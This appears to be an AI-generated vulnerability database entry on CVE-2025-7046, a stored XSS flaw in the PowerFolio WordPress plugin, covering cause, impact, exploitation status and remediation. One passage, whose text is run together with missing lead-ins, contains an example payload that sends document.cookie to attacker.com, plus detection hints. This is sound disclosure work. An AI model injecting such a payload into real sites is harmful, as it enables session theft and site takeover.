
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-7046 is a Stored Cross-Site Scripting (XSS) vulnerability in the Portfolio for Elementor & Image Gallery | PowerFolio WordPress plugin. It affects all versions up to and including 3.2.0, stemming from insufficient input sanitization and output escaping in the Custom JS Attributes of the plugin's widgets. Authenticated attackers with Contributor-level access or above can inject arbitrary web scripts into pages that execute when any user visits the affected page. The vulnerability was disclosed on July 4, 2025, partially addressed in version 3.2.0, and fully fixed in version 3.2.1. It carries a CVSS v3.1 base score of 5.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically in how the plugin handles Custom JS Attributes within its Elementor widgets (e.g., portfolio_widget.php and image_gallery_widget.php). Because user-supplied input is neither properly sanitized on input nor escaped on output, a contributor-level user can embed malicious JavaScript payloads directly into widget attributes. The attack vector is network-based, requires low privileges (Contributor role), and necessitates user interaction (a victim visiting the injected page) to trigger script execution. Relevant source code locations are publicly visible in the plugin's Trac repository (WordPress Trac - portfolio_widget, WordPress Trac - image_gallery_widget).
Successful exploitation allows an authenticated attacker with at minimum Contributor-level access to persistently inject malicious scripts into WordPress pages. When other users — including administrators — visit the compromised pages, the injected scripts execute in their browser context, potentially enabling session cookie theft, credential harvesting, keystroke capture, unauthorized actions performed on behalf of victims, or redirection to malicious sites. While availability is not directly impacted, the confidentiality and integrity risks are meaningful, particularly if an administrator's session is hijacked, which could lead to full site compromise (Wordfence, Red Hat CVE).
As of the time of disclosure, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (Wordfence). The EPSS score is approximately 0.03%, reflecting a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.
"><script>document.location='https://attacker.com/steal?c='+document.cookie</script> into the attribute field.<script> tags, JavaScript event handlers (e.g., onerror, onload), or encoded payloads within Custom JS Attribute fields of PowerFolio widgets.wp_posts, wp_postmeta) for suspicious JavaScript strings in widget settings.The primary remediation is to update the PowerFolio plugin to version 3.2.1 or later, which fully resolves the vulnerability (version 3.2.0 only partially addressed it) (WordPress Trac Changeset, Wordfence). As interim measures, site administrators should restrict Contributor-level user registrations, audit existing contributor accounts for suspicious content, and deploy a Web Application Firewall (WAF) with XSS detection rules. Regularly auditing plugin permissions and limiting the use of Custom JS Attribute fields to trusted users is also recommended.
Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for the period of June 30 – July 6, 2025, and assigned the CVE through their threat intelligence program (Wordfence Weekly Report). The vulnerability was also catalogued by ENISA's EUVD (EUVD-2025-19927) and noted by Red Hat's CVE tracking. No significant independent researcher commentary or broader media coverage has been identified beyond standard vulnerability aggregator listings.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."